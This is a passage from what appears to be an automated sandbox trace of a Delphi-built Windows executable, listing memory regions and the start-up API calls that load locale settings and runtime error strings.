= 0x7fe7d000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe7d000" filename = "" Region: id = 626 start_va = 0x7fe80000 end_va = 0x7fe82fff entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 627 start_va = 0x7fe83000 end_va = 0x7fe85fff entry_point = 0x0 region_type = private name = "private_0x000000007fe83000" filename = "" Region: id = 628 start_va = 0x39e0000 end_va = 0x3a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 629 start_va = 0x3a20000 end_va = 0x3b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 630 start_va = 0x3b20000 end_va = 0x3b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 631 start_va = 0x3b60000 end_va = 0x3c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 632 start_va = 0x3c60000 end_va = 0x3c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 633 start_va = 0x3ca0000 end_va = 0x3d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 634 start_va = 0x3da0000 end_va = 0x3ddffff entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 635 start_va = 0x3de0000 end_va = 0x3edffff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 636 start_va = 0x7fe6e000 end_va = 0x7fe70fff entry_point = 0x0 region_type = private name = "private_0x000000007fe6e000" filename = "" Region: id = 637 start_va = 0x7fe71000 end_va = 0x7fe73fff entry_point = 0x0 region_type = private name = "private_0x000000007fe71000" filename = "" Region: id = 638 start_va = 0x7fe74000 end_va = 0x7fe76fff entry_point = 0x0 region_type = private name = "private_0x000000007fe74000" filename = "" Region: id = 639 start_va = 0x7fe77000 end_va = 0x7fe79fff entry_point = 0x0 region_type = private name = "private_0x000000007fe77000" filename = "" Region: id = 640 start_va = 0x3ee0000 end_va = 0x3f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 641 start_va = 0x3f20000 end_va = 0x401ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 642 start_va = 0x4020000 end_va = 0x405ffff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 643 start_va = 0x4060000 end_va = 0x415ffff entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 644 start_va = 0x4160000 end_va = 0x419ffff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 645 start_va = 0x41a0000 end_va = 0x429ffff entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 646 start_va = 0x42a0000 end_va = 0x42dffff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 647 start_va = 0x42e0000 end_va = 0x43dffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 648 start_va = 0x7fe62000 end_va = 0x7fe64fff entry_point = 0x0 region_type = private name = "private_0x000000007fe62000" filename = "" Region: id = 649 start_va = 0x7fe65000 end_va = 0x7fe67fff entry_point = 0x0 region_type = private name = "private_0x000000007fe65000" filename = "" Region: id = 650 start_va = 0x7fe68000 end_va = 0x7fe6afff entry_point = 0x0 region_type = private name = "private_0x000000007fe68000" filename = "" Region: id = 651 start_va = 0x7fe6b000 end_va = 0x7fe6dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe6b000" filename = "" Region: id = 652 start_va = 0x43e0000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 653 start_va = 0x4420000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 654 start_va = 0x4520000 end_va = 0x455ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 655 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 656 start_va = 0x4660000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 657 start_va = 0x46a0000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 658 start_va = 0x7fe59000 end_va = 0x7fe5bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe59000" filename = "" Region: id = 659 start_va = 0x7fe5c000 end_va = 0x7fe5efff entry_point = 0x0 region_type = private name = "private_0x000000007fe5c000" filename = "" Region: id = 660 start_va = 0x7fe5f000 end_va = 0x7fe61fff entry_point = 0x0 region_type = private name = "private_0x000000007fe5f000" filename = "" Region: id = 661 start_va = 0x47a0000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 662 start_va = 0x47e0000 end_va = 0x48dffff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 663 start_va = 0x48e0000 end_va = 0x491ffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 664 start_va = 0x4920000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 665 start_va = 0x4a20000 end_va = 0x4a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 666 start_va = 0x4a60000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 667 start_va = 0x4b60000 end_va = 0x4b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 668 start_va = 0x4ba0000 end_va = 0x4c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 669 start_va = 0x7fe4d000 end_va = 0x7fe4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe4d000" filename = "" Region: id = 670 start_va = 0x7fe50000 end_va = 0x7fe52fff entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 671 start_va = 0x7fe53000 end_va = 0x7fe55fff entry_point = 0x0 region_type = private name = "private_0x000000007fe53000" filename = "" Region: id = 672 start_va = 0x7fe56000 end_va = 0x7fe58fff entry_point = 0x0 region_type = private name = "private_0x000000007fe56000" filename = "" Region: id = 673 start_va = 0x4ca0000 end_va = 0x4cdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 674 start_va = 0x4ce0000 end_va = 0x4ddffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 675 start_va = 0x4de0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 676 start_va = 0x4e20000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 677 start_va = 0x4f20000 end_va = 0x4f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 678 start_va = 0x4f60000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 679 start_va = 0x7fe44000 end_va = 0x7fe46fff entry_point = 0x0 region_type = private name = "private_0x000000007fe44000" filename = "" Region: id = 680 start_va = 0x7fe47000 end_va = 0x7fe49fff entry_point = 0x0 region_type = private name = "private_0x000000007fe47000" filename = "" Region: id = 681 start_va = 0x7fe4a000 end_va = 0x7fe4cfff entry_point = 0x0 region_type = private name = "private_0x000000007fe4a000" filename = "" Region: id = 682 start_va = 0x5060000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 683 start_va = 0x50a0000 end_va = 0x519ffff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 684 start_va = 0x51a0000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 685 start_va = 0x51e0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 686 start_va = 0x52e0000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 687 start_va = 0x5320000 end_va = 0x541ffff entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 688 start_va = 0x5420000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 689 start_va = 0x5460000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 690 start_va = 0x7fe38000 end_va = 0x7fe3afff entry_point = 0x0 region_type = private name = "private_0x000000007fe38000" filename = "" Region: id = 691 start_va = 0x7fe3b000 end_va = 0x7fe3dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe3b000" filename = "" Region: id = 692 start_va = 0x7fe3e000 end_va = 0x7fe40fff entry_point = 0x0 region_type = private name = "private_0x000000007fe3e000" filename = "" Region: id = 693 start_va = 0x7fe41000 end_va = 0x7fe43fff entry_point = 0x0 region_type = private name = "private_0x000000007fe41000" filename = "" Region: id = 694 start_va = 0x5560000 end_va = 0x559ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 695 start_va = 0x55a0000 end_va = 0x569ffff entry_point = 0x0 region_type = private name = "private_0x00000000055a0000" filename = "" Region: id = 696 start_va = 0x56a0000 end_va = 0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 697 start_va = 0x56e0000 end_va = 0x57dffff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 698 start_va = 0x57e0000 end_va = 0x581ffff entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 699 start_va = 0x5820000 end_va = 0x591ffff entry_point = 0x0 region_type = private name = "private_0x0000000005820000" filename = "" Region: id = 700 start_va = 0x5920000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005920000" filename = "" Region: id = 701 start_va = 0x5960000 end_va = 0x5a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 702 start_va = 0x5a60000 end_va = 0x5a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a60000" filename = "" Region: id = 703 start_va = 0x5aa0000 end_va = 0x5b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000005aa0000" filename = "" Region: id = 704 start_va = 0x5ba0000 end_va = 0x5bdffff entry_point = 0x0 region_type = private name = "private_0x0000000005ba0000" filename = "" Region: id = 705 start_va = 0x5be0000 end_va = 0x5cdffff entry_point = 0x0 region_type = private name = "private_0x0000000005be0000" filename = "" Region: id = 706 start_va = 0x5ce0000 end_va = 0x5d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ce0000" filename = "" Region: id = 707 start_va = 0x5d20000 end_va = 0x5e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 708 start_va = 0x5e20000 end_va = 0x5e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e20000" filename = "" Region: id = 709 start_va = 0x5e60000 end_va = 0x5f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 710 start_va = 0x7fe20000 end_va = 0x7fe22fff entry_point = 0x0 region_type = private name = "private_0x000000007fe20000" filename = "" Region: id = 711 start_va = 0x7fe23000 end_va = 0x7fe25fff entry_point = 0x0 region_type = private name = "private_0x000000007fe23000" filename = "" Region: id = 712 start_va = 0x7fe26000 end_va = 0x7fe28fff entry_point = 0x0 region_type = private name = "private_0x000000007fe26000" filename = "" Region: id = 713 start_va = 0x7fe29000 end_va = 0x7fe2bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe29000" filename = "" Region: id = 714 start_va = 0x7fe2c000 end_va = 0x7fe2efff entry_point = 0x0 region_type = private name = "private_0x000000007fe2c000" filename = "" Region: id = 715 start_va = 0x7fe2f000 end_va = 0x7fe31fff entry_point = 0x0 region_type = private name = "private_0x000000007fe2f000" filename = "" Region: id = 716 start_va = 0x7fe32000 end_va = 0x7fe34fff entry_point = 0x0 region_type = private name = "private_0x000000007fe32000" filename = "" Region: id = 717 start_va = 0x7fe35000 end_va = 0x7fe37fff entry_point = 0x0 region_type = private name = "private_0x000000007fe35000" filename = "" Region: id = 718 start_va = 0x5f60000 end_va = 0x5f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f60000" filename = "" Region: id = 719 start_va = 0x5fa0000 end_va = 0x609ffff entry_point = 0x0 region_type = private name = "private_0x0000000005fa0000" filename = "" Region: id = 720 start_va = 0x60a0000 end_va = 0x60dffff entry_point = 0x0 region_type = private name = "private_0x00000000060a0000" filename = "" Region: id = 721 start_va = 0x60e0000 end_va = 0x61dffff entry_point = 0x0 region_type = private name = "private_0x00000000060e0000" filename = "" Region: id = 722 start_va = 0x61e0000 end_va = 0x621ffff entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 723 start_va = 0x6220000 end_va = 0x631ffff entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 724 start_va = 0x6320000 end_va = 0x635ffff entry_point = 0x0 region_type = private name = "private_0x0000000006320000" filename = "" Region: id = 725 start_va = 0x6360000 end_va = 0x645ffff entry_point = 0x0 region_type = private name = "private_0x0000000006360000" filename = "" Region: id = 726 start_va = 0x7fe14000 end_va = 0x7fe16fff entry_point = 0x0 region_type = private name = "private_0x000000007fe14000" filename = "" Region: id = 727 start_va = 0x7fe17000 end_va = 0x7fe19fff entry_point = 0x0 region_type = private name = "private_0x000000007fe17000" filename = "" Region: id = 728 start_va = 0x7fe1a000 end_va = 0x7fe1cfff entry_point = 0x0 region_type = private name = "private_0x000000007fe1a000" filename = "" Region: id = 729 start_va = 0x7fe1d000 end_va = 0x7fe1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe1d000" filename = "" Region: id = 730 start_va = 0x6460000 end_va = 0x649ffff entry_point = 0x0 region_type = private name = "private_0x0000000006460000" filename = "" Region: id = 731 start_va = 0x64a0000 end_va = 0x659ffff entry_point = 0x0 region_type = private name = "private_0x00000000064a0000" filename = "" Region: id = 732 start_va = 0x65a0000 end_va = 0x65dffff entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 733 start_va = 0x65e0000 end_va = 0x66dffff entry_point = 0x0 region_type = private name = "private_0x00000000065e0000" filename = "" Region: id = 734 start_va = 0x66e0000 end_va = 0x671ffff entry_point = 0x0 region_type = private name = "private_0x00000000066e0000" filename = "" Region: id = 735 start_va = 0x6720000 end_va = 0x681ffff entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 736 start_va = 0x6820000 end_va = 0x685ffff entry_point = 0x0 region_type = private name = "private_0x0000000006820000" filename = "" Region: id = 737 start_va = 0x6860000 end_va = 0x695ffff entry_point = 0x0 region_type = private name = "private_0x0000000006860000" filename = "" Region: id = 738 start_va = 0x6960000 end_va = 0x699ffff entry_point = 0x0 region_type = private name = "private_0x0000000006960000" filename = "" Region: id = 739 start_va = 0x69a0000 end_va = 0x6a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000069a0000" filename = "" Region: id = 740 start_va = 0x6aa0000 end_va = 0x6adffff entry_point = 0x0 region_type = private name = "private_0x0000000006aa0000" filename = "" Region: id = 741 start_va = 0x6ae0000 end_va = 0x6bdffff entry_point = 0x0 region_type = private name = "private_0x0000000006ae0000" filename = "" Region: id = 742 start_va = 0x6be0000 end_va = 0x6c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006be0000" filename = "" Region: id = 743 start_va = 0x6c20000 end_va = 0x6d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c20000" filename = "" Region: id = 744 start_va = 0x6d20000 end_va = 0x6d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d20000" filename = "" Region: id = 745 start_va = 0x6d60000 end_va = 0x6e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d60000" filename = "" Region: id = 746 start_va = 0x6e60000 end_va = 0x6e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e60000" filename = "" Region: id = 747 start_va = 0x6ea0000 end_va = 0x6f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ea0000" filename = "" Region: id = 748 start_va = 0x7fdf9000 end_va = 0x7fdfbfff entry_point = 0x0 region_type = private name = "private_0x000000007fdf9000" filename = "" Region: id = 749 start_va = 0x7fdfc000 end_va = 0x7fdfefff entry_point = 0x0 region_type = private name = "private_0x000000007fdfc000" filename = "" Region: id = 750 start_va = 0x7fdff000 end_va = 0x7fe01fff entry_point = 0x0 region_type = private name = "private_0x000000007fdff000" filename = "" Region: id = 751 start_va = 0x7fe02000 end_va = 0x7fe04fff entry_point = 0x0 region_type = private name = "private_0x000000007fe02000" filename = "" Region: id = 752 start_va = 0x7fe05000 end_va = 0x7fe07fff entry_point = 0x0 region_type = private name = "private_0x000000007fe05000" filename = "" Region: id = 753 start_va = 0x7fe08000 end_va = 0x7fe0afff entry_point = 0x0 region_type = private name = "private_0x000000007fe08000" filename = "" Region: id = 754 start_va = 0x7fe0b000 end_va = 0x7fe0dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe0b000" filename = "" Region: id = 755 start_va = 0x7fe0e000 end_va = 0x7fe10fff entry_point = 0x0 region_type = private name = "private_0x000000007fe0e000" filename = "" Region: id = 756 start_va = 0x7fe11000 end_va = 0x7fe13fff entry_point = 0x0 region_type = private name = "private_0x000000007fe11000" filename = "" Region: id = 758 start_va = 0x6fa0000 end_va = 0x6fdffff entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 759 start_va = 0x6fe0000 end_va = 0x70dffff entry_point = 0x0 region_type = private name = "private_0x0000000006fe0000" filename = "" Region: id = 760 start_va = 0x70e0000 end_va = 0x711ffff entry_point = 0x0 region_type = private name = "private_0x00000000070e0000" filename = "" Region: id = 761 start_va = 0x7120000 end_va = 0x721ffff entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 762 start_va = 0x7220000 end_va = 0x731ffff entry_point = 0x0 region_type = private name = "private_0x0000000007220000" filename = "" Region: id = 763 start_va = 0x7fdf3000 end_va = 0x7fdf5fff entry_point = 0x0 region_type = private name = "private_0x000000007fdf3000" filename = "" Region: id = 764 start_va = 0x7fdf6000 end_va = 0x7fdf8fff entry_point = 0x0 region_type = private name = "private_0x000000007fdf6000" filename = "" Region: id = 770 start_va = 0x7320000 end_va = 0x735ffff entry_point = 0x0 region_type = private name = "private_0x0000000007320000" filename = "" Region: id = 771 start_va = 0x7360000 end_va = 0x745ffff entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 772 start_va = 0x745e0000 end_va = 0x745eefff entry_point = 0x745e0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 773 start_va = 0x7fdf0000 end_va = 0x7fdf2fff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 6129 start_va = 0x3120000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 6130 start_va = 0x3160000 end_va = 0x325ffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 6131 start_va = 0x7fe8c000 end_va = 0x7fe8efff entry_point = 0x0 region_type = private name = "private_0x000000007fe8c000" filename = "" Thread: id = 15 os_tid = 0x3ac [0086.442] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0086.443] SetThreadLocale (Locale=0x400) returned 1 [0086.446] GetVersion () returned 0x23f00206 [0086.446] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.446] GetProcAddress (hModule=0x75130000, lpProcName="GetThreadPreferredUILanguages") returned 0x751495e0 [0086.446] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.446] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadPreferredUILanguages") returned 0x75149a20 [0086.447] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0086.447] GetProcAddress (hModule=0x75130000, lpProcName="GetThreadUILanguage") returned 0x7514d980 [0086.447] GetSystemInfo (in: lpSystemInfo=0x19fbe4 | out: lpSystemInfo=0x19fbe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0086.447] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.447] GetStartupInfoW (in: lpStartupInfo=0x19fbc0 | out: lpStartupInfo=0x19fbc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0086.447] GetACP () returned 0x4e4 [0086.447] GetCurrentThreadId () returned 0x3ac [0086.447] GetVersion () returned 0x23f00206 [0086.447] GetVersionExW (in: lpVersionInformation=0x19faf4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x779d37dd, dwMinorVersion=0x0, dwBuildNumber=0x19fbe0, dwPlatformId=0x0, szCSDVersion="\x09") | out: lpVersionInformation=0x19faf4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0086.507] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19d9b0, nSize=0x20a | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x2a [0086.507] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19d79a, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x2a [0086.507] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1da0000 [0086.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0086.508] GetUserDefaultUILanguage () returned 0x409 [0086.508] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0086.508] GetThreadUILanguage () returned 0x190409 [0086.508] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d718 | out: pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d718) returned 1 [0086.509] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x1eca680, pcchLanguagesBuffer=0x19d718 | out: pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x1eca680, pcchLanguagesBuffer=0x19d718) returned 1 [0086.509] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.en-US", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0086.509] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.en", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0086.509] GetUserDefaultUILanguage () returned 0x409 [0086.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x19d734, cchData=4 | out: lpLCData="ENU") returned 4 [0086.510] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.ENU", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0086.510] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.EN", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0086.510] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0086.511] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 